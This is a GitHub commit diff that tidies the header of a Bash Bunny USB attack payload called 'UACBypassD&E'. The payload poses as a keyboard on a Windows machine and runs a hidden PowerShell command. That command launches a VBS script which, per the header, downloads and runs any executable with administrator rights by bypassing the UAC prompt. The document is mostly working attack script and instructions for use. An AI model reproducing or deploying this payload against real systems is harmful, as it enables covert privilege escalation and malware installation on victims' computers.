Cleanup: exe_UACBypassD&E: Update Payload Header

cleanup
Marc 2019-07-05 08:12:17 +01:00 committed by GitHub
parent 17ef1c0099
commit 5e1dbdb489
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 7 deletions

View File

@ -2,13 +2,23 @@
# Author: Skiddie # Author: Skiddie
# Version: 1.1 # Version: 1.1
# Target: Windows # Target: Windows
# Attack Modes: HID, STORAGE
# #
# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10. The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges. However from what i am aware version 7,8 and 8.1 are still effected. Currently fastest download and execute for HID attacks to date. (with UAC bypass) # Description: Download and executes any binary executable with administrator privileges WITHOUT prompting
# the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME
# in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10.
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges.
# However from what I am aware version 7,8 and 8.1 are still effected.
# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
#
# LEDS:
# Magenta: Starting
# Green: Finished
#Define your bunny storage stick name #Define your bunny storage stick name
DRIVER_LABEL='BashBunny' DRIVER_LABEL='BashBunny'
#RED means starting #Magenta means starting
LED SETUP LED SETUP
#Gets File locations #Gets File locations
@ -17,7 +27,6 @@ GET SWITCH_POSITION
#We are a keyboard #We are a keyboard
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
QUACK DELAY 500 QUACK DELAY 500
RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')" RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')"
QUACK DELAY 1000 QUACK DELAY 1000